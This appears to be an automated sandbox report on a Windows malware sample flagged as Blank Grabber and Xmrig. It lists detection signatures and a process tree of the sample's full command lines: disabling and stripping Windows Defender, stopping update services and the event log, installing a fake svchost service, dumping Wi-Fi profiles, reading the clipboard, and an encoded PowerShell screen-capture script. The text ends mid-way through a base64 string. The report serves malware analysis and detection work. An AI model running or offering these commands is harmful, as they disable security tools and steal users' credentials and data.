Edit tour

Windows Analysis Report
47SXvEQ.exe

Overview

General Information

Sample name:	47SXvEQ.exe
Analysis ID:	1585573
MD5:	ce5152d5376f6ad0c918fb893248dd08
SHA1:	9d5c6c34c29396d141f4df77166e522d57aca6e3
SHA256:	e3dbee51df9dd78d9b3d643f7d7f9c7cb84b88819647d436f1a595d7c1a51e87
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

Blank Grabber, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Disable power options

Sigma detected: Stop EventLog

Yara detected Blank Grabber

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Drops PE files with benign system names

Encrypted powershell cmdline option found

Hides threads from debuggers

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sample is not signed and drops a device driver

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Suspect Svchost Activity

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Uses powercfg.exe to modify the power settings

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates driver files

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

47SXvEQ.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\47SXvEQ.exe" MD5: CE5152D5376F6AD0C918FB893248DD08)

instals.exe (PID: 3716 cmdline: "C:\Users\user\AppData\Local\Temp\instals.exe" MD5: C289921058A4B38BDBD1373A0CBB757D)

powershell.exe (PID: 1136 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7940 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 7880 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8024 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8172 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3288 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2944 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6768 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 180 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7324 cmdline: C:\Windows\system32\sc.exe delete "NPYIAYNC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6164 cmdline: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7592 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7604 cmdline: C:\Windows\system32\sc.exe start "NPYIAYNC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Built.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: CF6FC2AEA60B6D65DCC9C16166C8161A)

Built.exe (PID: 1420 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: CF6FC2AEA60B6D65DCC9C16166C8161A)

cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3068 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1068 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7092 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7204 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 6164 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7188 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7024 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7176 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7564 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7636 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7708 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7800 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8156 cmdline: attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2676 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7936 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3808 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2144 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 928 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7896 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7988 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

Conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 6228 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 3512 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 6208 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6948 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2536 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2944 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG